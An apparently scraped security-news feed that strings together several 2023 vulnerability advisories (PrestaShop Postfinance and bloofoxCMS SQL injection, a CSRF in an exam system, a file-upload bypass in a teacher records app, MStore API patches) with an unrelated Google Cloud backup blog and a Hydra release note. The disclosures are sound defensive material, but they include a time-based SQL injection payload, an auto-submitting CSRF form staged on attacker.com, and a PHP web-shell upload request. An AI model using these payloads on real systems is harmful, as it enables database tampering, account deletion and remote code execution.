PrestaShop postfinance <= 17.1.13 is vulnerable to SQL Injection via PostfinanceValidationModuleFrontController::postProcess().

SQL injection vulnerability found in the module “Postfinance” edited by Webbax for PrestaShop before 17.1.14. (17.1.14 fix the issue) allow a remote attacker to perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-31671
*   **Published at**: 2023-06-13
*   **Advisory source**: Friends-Of-Presta
*   **Platform**: PrestaShop
*   **Product**: postfinance
*   **Impacted release**: <= 17.1.13 (17.1.14 fix the issue).
*   **Product author**: Webbax
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Before version 17.1.14, a sensitive SQL call in the class PostfinanceValidationModuleFrontController::postProcess() could be executed with a trivial HTTP call and exploited to forge a blind SQL injection by sending the orderID variable as a GET parameter. Its exploded version, $get_id_cart (a part of orderID), is then used in a SQL query.

This vulnerability can be exploited by an attacker to manipulate the SQL query and potentially gain unauthorized access to the database. It is important to update to version 17.1.14 or later to address this issue and ensure the security of the system.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data on the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to exposed tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijacked emails

**Patch**

    --- a/modules/postfiannce/validation.php
    +++ b/modules/postfiannce/validation.php
            if(Tools::strtoupper(sha1($string_crypt))==$sha){
            //if(Tools::strtoupper(sha1($string_crypt))==$sha && $getv_postfinance_upper['AMOUNT']==$cart->getOrderTotal(true,3)){
                
                $Postfinance = new Postfinance();
                
                // si le panier n'a pas été converti
    -            $orderExists = (bool)Db::getInstance()->getValue('SELECT count(*) FROM `'._DB_PREFIX_.'orders` WHERE `id_cart`='.pSQL($get_id_cart));
    +            $orderExists = (bool)Db::getInstance()->getValue('SELECT count(*) FROM `'._DB_PREFIX_.'orders` WHERE `id_cart`='. (int) $get_id_cart);
                if(
    

**Other recommendations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-04-12

Sensitive SQL parameter analysed by 202 ecommerce

2023-04-14

Contact the author

2023-04-14

Request a CVE ID

2023-04-14

The author confirm a fix is available on 17.1.14

2023-06-13

Publication of this security advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-31671: [CVE-2023-31671] Improper neutralization of SQL parameter in Postfinance module

bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the cid parameter at admin/index.php?mode=settings&page=charset&action=edit.

****Vendor Homepage:****

bloofoxCMS - Home

****Version:****

0.5.2.1

****Tested On:****

Macos, review source code

****Affected Page:****

admin/index.php?mode=settings&page=projects&action=edit \[Parameter cid\]

admin/index.php?mode=settings&page=plugins&action=edit\[Parameter pid\]

admin/index.php?mode=settings&page=lang&action=edit \[Parameter lid\]

admin/index.php?mode=settings&page=tmpl&action=edit \[Parameter tid\]

admin/index.php?mode=settings&page=charset&action=edit \[Parameter cid\]

admin/index.php?mode=user&action=edit \[Parameter userid\]

admin/index.php?mode=user&page=groups&action=edit \[Parameter gid\]

****Affected Code:****

bloofoxCMS/admin/include/inc\_settings\_plugins.php

bloofoxCMS/admin/include/inc\_settings\_projects.php

bloofoxCMS/admin/include/inc\_settings\_lang.php

bloofoxCMS/admin/include/inc\_settings\_tmpl.php

bloofoxCMS/admin/include/inc\_settings\_charset.php

bloofoxCMS/admin/include/inc\_user\_user.php

bloofoxCMS/admin/include/inc\_user\_groups.php

****Description:****

A vulnerability SQL injection was found in bloofoxCMS version 0.5.2.1. It has been classified as critical. SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.

****Proof of Concept:********1\. Visit function plugin and edit plugin item:****

****2\. Intercept request edit and inject payload sql injection to sleep 5 seconds :****

    4'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(5)))hwrS)--+Ptkr%26send%3dSave
    

****3\. Run SQLmap to exploit:****

****SOURCE CODE VULNERABLE****

.$\_POST\['pid'\] does not have any filter or validate.

_bloofoxCMS/admin/include/inc\_settings\_plugins.php_

            if(isset($_POST['send']) && $sys_group_vars['demo'] == 0 && $sys_rights['set_plugins']['write'] == 1) {
                $db->query("UPDATE ".$tbl_prefix."sys_plugin SET status = '".$_POST['status']."' WHERE pid = '".$_POST['pid']."' LIMIT 1");
                CreateConfirmMessage(1,get_caption("0390","Changes have been saved."));
                load_url("index.php?mode=settings&page=plugins");
            }

CVE-2023-34756: bloofox v0.5.2.1 was discovered to contain many SQL injection vulnerability

bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the lid parameter at admin/index.php?mode=settings&page=lang&action=edit.

CVE-2023-34752

Online Examination System Project version 1.0 suffers from a cross site request forgery vulnerability.

    # Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)# Google Dork: n/a# Date: 09/06/2023# Exploit Author: Ramil Mustafayev (kryptohaker)# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Version: 1.0# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28# CVE : n/aOnline Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.To exploit this vulnerability, an attacker needs to do the following:1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:<html>  <body>    <form action="http://example.com/update.php" method="GET">      <input type="hidden" name="demail" value="victim@example.com" />    </form>    <script>      document.forms[0].submit();    </script>  </body></html>4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html5. Send the URL of the HTML page to the admin user via email, social media, or any other means.If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.

Online Examination System Project 1.0 Cross Site Request Forgery

Teachers Record Management System version 1.0 suffers from file upload validation bypass vulnerability.

    Exploit Title: Teachers Record Management System 1.0 – File Upload Type ValidationDate: 17-01-2023EXPLOIT-AUTHOR: AFFAN AHMEDVendor Homepage: <https://phpgurukul.com>Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>Version: 1.0Tested on: Windows 11 + XAMPPCVE : CVE-2023-3187===============================STEPS_TO_REPRODUCE===============================1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”Password: Test@123”2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image3. Open the Burp-suite and Intercept the Edit Image Request4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”5. Change the **Content-type from “ image/png “ to “ image/gif “6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**8. Below is the Burpsuite-POST Request for all the changes that I have made above==========================================BURPSUITE_REQUEST==========================================POST /trms/teacher/changeimage.php HTTP/1.1Host: localhostContent-Length: 442Cache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: <http://localhost>Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: <http://localhost/trms/teacher/changeimage.php>Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qcConnection: close------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="subjects"John Doe------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"Content-Type: image/gifGIF89a <?php echo system($_REQUEST['dx']); ?>------WebKitFormBoundaryndAPYa0GGOxSUHdFContent-Disposition: form-data; name="submit"------WebKitFormBoundaryndAPYa0GGOxSUHdF--===============================PROOF_OF_CONCEPT===============================GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md

Teachers Record Management System 1.0 Validation Bypass

The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_message function. This makes it possible for unauthenticated attackers to update new order message via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-3200: mstore-api.php in mstore-api/trunk – WordPress Plugin Repository

The MStore API plugin for WordPress is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the mstore_update_new_order_title function. This makes it possible for unauthenticated attackers to update new order title via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

**mstore-api/trunk/assets/js/mstore-inspireui.js**

r2610824

r2925048

 

22

22

    $(document).on('blur', '.mstore-update-limit-product', function () {

23

23

        var limit = $(this).val();

 

24

        var nonce = $(this).data('nonce');

24

25

        $.ajax({

25

26

            type: 'post',

…

…

 

27

28

            data: {

28

29

                action: 'mstore\_update\_limit\_product',

29

 

                limit: limit

 

30

                limit: limit,

 

31

                nonce: nonce

30

32

            },

31

33

            success: function (result) {

…

…

 

39

41

    $(document).on('blur', '.mstore-update-firebase-server-key', function () {

40

42

        var serverKey = $(this).val();

 

43

        var nonce = $(this).data('nonce');

41

44

        $.ajax({

42

45

            type: 'post',

…

…

 

44

47

            data: {

45

48

                action: 'mstore\_update\_firebase\_server\_key',

46

 

                serverKey: serverKey

 

49

                serverKey: serverKey,

 

50

                nonce: nonce

47

51

            },

48

52

            success: function (result) {

…

…

 

56

60

    $(document).on('blur', '.mstore-update-new-order-title', function () {

57

61

        var title = $(this).val();

 

62

        var nonce = $(this).data('nonce');

58

63

        $.ajax({

59

64

            type: 'post',

…

…

 

61

66

            data: {

62

67

                action: 'mstore\_update\_new\_order\_title',

63

 

                title: title

 

68

                title: title,

 

69

                nonce: nonce

64

70

            },

65

71

            success: function (result) {

…

…

 

73

79

    $(document).on('blur', '.mstore-update-new-order-message', function () {

74

80

        var message = $(this).val();

 

81

        var nonce = $(this).data('nonce');

75

82

        $.ajax({

76

83

            type: 'post',

…

…

 

78

85

            data: {

79

86

                action: 'mstore\_update\_new\_order\_message',

80

 

                message: message

 

87

                message: message,

 

88

                nonce: nonce

81

89

            },

82

90

            success: function (result) {

…

…

 

90

98

    $(document).on('blur', '.mstore-update-status-order-title', function () {

91

99

        var title = $(this).val();

 

100

        var nonce = $(this).data('nonce');

92

101

        $.ajax({

93

102

            type: 'post',

…

…

 

95

104

            data: {

96

105

                action: 'mstore\_update\_status\_order\_title',

97

 

                title: title

 

106

                title: title,

 

107

                nonce: nonce

98

108

            },

99

109

            success: function (result) {

…

…

 

107

117

    $(document).on('blur', '.mstore-update-status-order-message', function () {

108

118

        var message = $(this).val();

 

119

        var nonce = $(this).data('nonce');

109

120

        $.ajax({

110

121

            type: 'post',

…

…

 

112

123

            data: {

113

124

                action: 'mstore\_update\_status\_order\_message',

114

 

                message: message

 

125

                message: message,

 

126

                nonce: nonce

115

127

            },

116

128

            success: function (result) {

**mstore-api/trunk/controllers/flutter-booking.php**

r2924554

r2925048

 

188

188

        global $wpdb;

189

189

        $table\_name = $wpdb->prefix . "wc\_appointment\_relationships";

190

 

        $items = $wpdb->get\_results("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

190

        $sql = $wpdb->prepare("SELECT \* FROM $table\_name WHERE product\_id = '$product\_id'");

 

191

        $items = $wpdb->get\_results($sql);

191

192

        foreach ($items as $item) {

192

193

            $user = get\_user\_by("ID", $item->staff\_id);

**mstore-api/trunk/controllers/flutter-wholesale.php**

r2924554

r2925048

 

75

75

        $role = $params\["role"\];

76

76

       

77

 

        if (isset($role) && in\_array($role, \['administrator','owner'\], true)) {

 

77

        if (!class\_exists('WooCommerceWholeSalePrices')) {

 

78

            return parent::sendError("invalid\_plugin", "You need to install WooCommerce Wholesale Prices plugin to use this api", 404);

 

79

        }

 

80

        global $wc\_wholesale\_prices;

 

81

        $data =  $wc\_wholesale\_prices->wwp\_wholesale\_roles->getAllRegisteredWholesaleRoles();

 

82

        $roles = \[\];

 

83

        $roles = array\_keys($data);

 

84

        $roles\[\] = 'subscriber';

 

85

        if (!isset($role) || !in\_array($role,$roles, true)) {

78

86

            return parent::sendError("invalid\_role", "Role is invalid.", 400);

79

87

        }

**mstore-api/trunk/mstore-api.php**

r2924554

r2925048

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.6

 

6

 \* Version: 3.9.7

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

41

41

class MstoreCheckOut

42

42

{

43

 

    public $version = '3.9.6';

 

43

    public $version = '3.9.7';

44

44

45

45

    public function \_\_construct()

…

…

 

213

213

214

214

    function mstore\_delete\_json\_file(){

215

 

        if(current\_user\_can( 'edit\_posts' )){

 

215

        if(checkIsAdmin(get\_current\_user\_id())){

216

216

            $id = sanitize\_text\_field($\_REQUEST\['id'\]);

217

217

            $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

218

218

            FlutterUtils::delete\_config\_file($id, $nonce);

 

219

        }else{

 

220

            wp\_send\_json\_error('No Permission',401);

219

221

        }

220

222

    }

…

…

 

222

224

    function mstore\_update\_limit\_product()

223

225

    {

224

 

        if(current\_user\_can( 'edit\_posts' )){

 

226

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

227

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_limit\_product')){

225

228

            $limit = sanitize\_text\_field($\_REQUEST\['limit'\]);

226

229

            if (is\_numeric($limit)) {

227

230

                update\_option("mstore\_limit\_product", intval($limit));

228

231

            }

 

232

        }else{

 

233

            wp\_send\_json\_error('No Permission',401);

229

234

        }

230

235

    }

…

…

 

232

237

    function mstore\_update\_firebase\_server\_key()

233

238

    {

234

 

        if(current\_user\_can( 'edit\_posts' )){

 

239

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

240

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_firebase\_server\_key')){

235

241

            $serverKey = sanitize\_text\_field($\_REQUEST\['serverKey'\]);

236

242

            update\_option("mstore\_firebase\_server\_key", $serverKey);

 

243

        }else{

 

244

            wp\_send\_json\_error('No Permission',401);

237

245

        }

238

246

    }

…

…

 

240

248

    function mstore\_update\_new\_order\_title()

241

249

    {

242

 

        if(current\_user\_can( 'edit\_posts' )){

 

250

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

251

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_title')){

243

252

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

244

253

            update\_option("mstore\_new\_order\_title", $title);

 

254

        }else{

 

255

            wp\_send\_json\_error('No Permission',401);

245

256

        }

246

257

    }

…

…

 

248

259

    function mstore\_update\_new\_order\_message()

249

260

    {

250

 

        if(current\_user\_can( 'edit\_posts' )){

 

261

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

262

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_new\_order\_message')){

251

263

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

252

264

            update\_option("mstore\_new\_order\_message", $message);

 

265

        }else{

 

266

            wp\_send\_json\_error('No Permission',401);

253

267

        }

254

268

    }

…

…

 

256

270

    function mstore\_update\_status\_order\_title()

257

271

    {

258

 

        if(current\_user\_can( 'edit\_posts' )){

 

272

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

273

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_title')){

259

274

            $title = sanitize\_text\_field($\_REQUEST\['title'\]);

260

275

            update\_option("mstore\_status\_order\_title", $title);

 

276

        }else{

 

277

            wp\_send\_json\_error('No Permission',401);

261

278

        }

262

279

    }

…

…

 

264

281

    function mstore\_update\_status\_order\_message()

265

282

    {

266

 

        if(current\_user\_can( 'edit\_posts' )){

 

283

        $nonce = sanitize\_text\_field($\_REQUEST\['nonce'\]);

 

284

        if(checkIsAdmin(get\_current\_user\_id()) && wp\_verify\_nonce($nonce, 'update\_status\_order\_message')){

267

285

            $message = sanitize\_text\_field($\_REQUEST\['message'\]);

268

286

            update\_option("mstore\_status\_order\_message", $message);

 

287

        }else{

 

288

            wp\_send\_json\_error('No Permission',401);

269

289

        }

270

290

    }

**mstore-api/trunk/readme.txt**

r2924554

r2925048

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.6

 

6

Stable tag:        3.9.7

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.7 =

 

47

  \* Fix security issues

 

48

46

49

\= 3.9.6 =

47

50

  \* Fix security issues

**mstore-api/trunk/templates/admin/mstore-api-admin-dashboard.php**

r2924554

r2925048

 

74

74

        ?>

75

75

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

76

 

            <input type="number" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

 

76

            <input type="number" data-nonce="<?php echo wp\_create\_nonce('update\_limit\_product'); ?>" value="<?php echo (!isset($limit) || $limit == false) ? 10 : esc\_attr($limit) ?>"

77

77

                   class="mstore-update-limit-product">

78

78

        </div>

…

…

 

88

88

        ?>

89

89

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

90

 

            <textarea class="mstore-update-firebase-server-key mstore\_input"

 

90

            <textarea data-nonce="<?php echo wp\_create\_nonce('update\_firebase\_server\_key'); ?>" class="mstore-update-firebase-server-key mstore\_input"

91

91

                      style="height: 120px"><?php echo esc\_attr($serverKey) ?></textarea>

92

92

        </div>

…

…

 

108

108

        ?>

109

109

        <div class="form-group" style="margin-top:10px;">

110

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($newOrderTitle); ?>"

 

110

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_title'); ?>" value="<?php echo esc\_attr($newOrderTitle); ?>"

111

111

                   class="mstore-update-new-order-title mstore\_input">

112

112

        </div>

113

113

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

114

 

            <textarea placeholder="Message" class="mstore-update-new-order-message mstore\_input"

 

114

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_new\_order\_message'); ?>" class="mstore-update-new-order-message mstore\_input"

115

115

                      style="height: 120px"><?php echo esc\_attr($newOrderMsg); ?></textarea>

116

116

        </div>

…

…

 

132

132

        ?>

133

133

        <div class="form-group" style="margin-top:10px;">

134

 

            <input type="text" placeholder="Title" value="<?php echo esc\_attr($statusOrderTitle); ?>"

 

134

            <input type="text" placeholder="Title" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_title'); ?>" value="<?php echo esc\_attr($statusOrderTitle); ?>"

135

135

                   class="mstore-update-status-order-title mstore\_input">

136

136

        </div>

137

137

        <div class="form-group" style="margin-top:10px;margin-bottom:40px">

138

 

            <textarea placeholder="Message" class="mstore-update-status-order-message mstore\_input"

 

138

            <textarea placeholder="Message" data-nonce="<?php echo wp\_create\_nonce('update\_status\_order\_message'); ?>" class="mstore-update-status-order-message mstore\_input"

139

139

                      style="height: 120px"><?php echo esc\_attr($statusOrderMsg); ?></textarea>

140

140

        </div>

CVE-2023-3201: Changeset 2925048 for mstore-api – WordPress Plugin Repository

Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2023-29372

By Owais Sultan
The Google Cloud Backup and Disaster Recovery (DR) service was introduced in September 2022, which enables centralized management…
This is a post from HackRead.com Read the original post: Essential Insights on Google Cloud Backup and Disaster Recovery Service

The Google Cloud Backup and Disaster Recovery (DR) service was introduced in September 2022, which enables centralized management of backup and DR directly from the Google Cloud console.

Wiseman categorized bikers into two main groups: those who wear protective gear and those who will eventually experience accidents. Similarly, companies can be divided into two groups when it comes to data protection: those who learn from the experiences of others and take precautions, and those who disregard the risks posed by hardware failures, site crashes, malware, viruses, software malfunctions, and human errors.

Some individuals or companies take measures to prevent data loss because they have heard stories from those who couldn’t recover from such incidents (approximately 80% of those who have experienced data loss). Additionally, larger companies face even fewer chances of successfully dealing with data loss.

In the modern business landscape, data security and protection are paramount for organizations worldwide. Numerous threats can result in data corruption, destruction, or loss. While it may be challenging to anticipate these factors, preventive measures can still be taken. This is where Backup and Disaster Recovery (DR) options come into play, ensuring the resilience and recoverability of data even in the most unexpected circumstances.

In this blog, we will explore the Backup, DR  and Google Cloud solutions and delve into the establishment of a robust infrastructure that enhances data security and protection in the face of malicious activities.

**Backup and Disaster Recovery Definition**

Let’s begin by understanding the concepts of Backup and DR.

What is data backup? Backup involves creating copies or archives of critical data and storing them in an alternate location, allowing for recovery in the event of data loss or corruption. Backup options in cloud services and on-premises infrastructure should possess the following characteristics:

*   Centralized backup management across various workloads.
*   Efficient utilization of storage to minimize costs.
*   Minimal recovery times.

On the other hand, disaster recovery (DR) refers to the processes and measures implemented to ensure the continuity of operations and the restoration of vital infrastructure following an adverse event.

When discussing Backup and DR, two essential metrics come into play when assessing the likelihood of recovering from natural or other disasters:

*   Recovery Time Objective (RTO): This is the maximum acceptable downtime for applications as per your service level agreement (SLA).
*   Recovery Point Objective (RPO): This indicates the maximum acceptable data loss duration from your application due to malicious activities.

In September 2022, Google introduced the Google Cloud Backup and DR service, which enables centralized management of Backup and DR directly from the Google Cloud console. Now, let’s delve into the key features and Google Cloud benefits for workload Backup and restoration.

**Google Cloud server backup**

Google Cloud offers its users a straightforward approach to setting up, restoring, and managing disaster recovery (DR) and various cloud backup strategies.

A key focus of the GCP backup solution is to provide a centralized management experience. What does this mean? It means that you can reduce the time spent on management and control by having a comprehensive view of your data protection.

With this capability, IT administrators can create application- and crash-consistent backups for virtual machines (VMs) on Compute Engine, VMware Engine, or on-premises VMware, as well as databases and file systems, all from a single interface. Your data will be stored in its original format, ensuring its readability for applications.

By leveraging data protection in the cloud, you can store all your valuable information in one backup storage, in a cost-effective format, without extensive translation or transition efforts. This reduces the time required for recovery and allows critical business operations to be restored more quickly.

To minimize the total cost of owning a backup solution, Google has developed a space-efficient technology called “incremental forever” storage as part of Cloud Backup and Disaster Recovery. This solution follows the principle of paying only for what you use and need. Here’s how it works: once you have your initial backup, Google Cloud will store subsequent backups by capturing only the block-level changes since the last backup session.

This approach enables faster backups, reduces the impact on production resources, minimizes network bandwidth requirements, and lowers storage costs by optimizing the amount of storage consumed by your backups.

Additionally, Google Cloud offers flexibility in terms of cost and data retention. With Google Cloud Storage, a managed service for storing unstructured data, you can choose the storage class that best suits your needs, balancing business requirements and cost efficiency.

For example, Archive Storage provides the lowest-cost option for highly durable storage, suitable for data archiving, with low-latency access, online backup, and disaster recovery capabilities, ensuring that your data is available within milliseconds.

**Key benefits of the service**

Many people mistakenly assume that storing data in the cloud automatically guarantees its safety in the face of disasters or threats like malware. However, it’s important to remember that simply using the cloud does not guarantee sufficient data security. It’s crucial to assess what backup and disaster recovery capabilities your cloud provider offers.

Here are the benefits of Google Cloud Platform (GCP) backup and disaster recovery:

1.  Streamlined data management and restoration: GCP provides centralized data management, allowing you to set up, monitor, and manage multiple workloads from a single dashboard.
2.  Minimal Recovery Point Objective (RPO): Google Cloud Backup and DR services are VMware and application-aware, supporting a wide range of databases such as MS SQL, PostgreSQL, SAP DB, Oracle, and MongoDB. This capability enables you to significantly reduce your RPO, potentially to as low as 10 minutes, without overloading your systems due to the always incremental concept.
3.  Instant recovery to eliminate downtime: With GCP, you can instantly mount your backup data to hosts, avoiding the need to wait for lengthy database restoration processes. This feature ensures that you can get back to business immediately. Additionally, if you are on-premises, you can leverage the onsite cache to restore your VMware and mount the data locally, resulting in lightning-fast recovery. Moreover, you can access any 10-minute slice of data since you started using the service.
4.  Snapshot functionality for various purposes: GCP allows you to instantly mount any slice of data as a writable snapshot, facilitating activities such as analysis, audit, legal processes, or testing.
5.  Cost optimization: Google Cloud Backup and DR Service charge you based on monthly usage, enabling you to pay only for what you actually use. The pricing is competitive, starting as low as $0.03 per GiB per month for regular data and varying for different types of databases. Additionally, Cloud Storage offers affordable space. There are no prior reservations required; you only pay for your actual data.
6.  Efficient storage utilization: GCP’s backup solution leverages incremental changes added to your initial backup, reducing the need for duplicating data. This approach saves both time and costs.
7.  Simplified infrastructure restoration: GCP allows you to restore your infrastructure with a single click. You can script complete data restoration to another region or migrate your on-premises infrastructure to the cloud within minutes, all without incurring additional costs. This feature enables you to save money while ensuring your data is highly protected. Additionally, you can schedule backup and DR testing, paying only for the target infrastructure during the time needed to restore and verify data and application integrity.

In summary, GCP Backup and DR solutions offer unique features that protect your cloud workloads from unforeseen events. They also provide a secure backup solution for on-premises data by storing it in Google Cloud. By leveraging these capabilities, you can optimize costs and benefit from efficient disaster recovery options in the cloud.

Compared to traditional legacy software and new entrants in the market, GCP’s Backup and DR functionalities stand out as a comprehensive, unique, and reliable solution.

**RELATED ARTICLES**

1.  What is Cloud Mining and How Does it Work?
2.  Google Vertex AI Vision: Revolutionizing E-Commerce?
3.  Google offers Dark Web monitoring for US Gmail users
4.  Beyond Price Point: Analyzing Differences in Cloud Storage Options
5.  Google Appoints VMware Co-founder to Charge Up Cloud Ventures

Essential Insights on Google Cloud Backup and Disaster Recovery Service

THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus.

**Hydra Network Logon Cracker 9.5**

Posted Jun 13, 2023

Authored by van Hauser, thc | Site thc.org

THC-Hydra is a high quality parallelized login hacker for Samba, Smbnt, Cisco AAA, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. Includes SSL support, parallel scans, and is part of Nessus.

Changes: 2 updates to http-form, 1 fix for smb2, 1 fix for smtp, and 1 fix for rdp.

tags | tool, web, imap

systems | cisco, unix

SHA-256 | 9dd193b011fdb3c52a17b0da61a38a4148ffcad731557696819d4721d1bee76b

Download | Favorite | View

Tag

#sql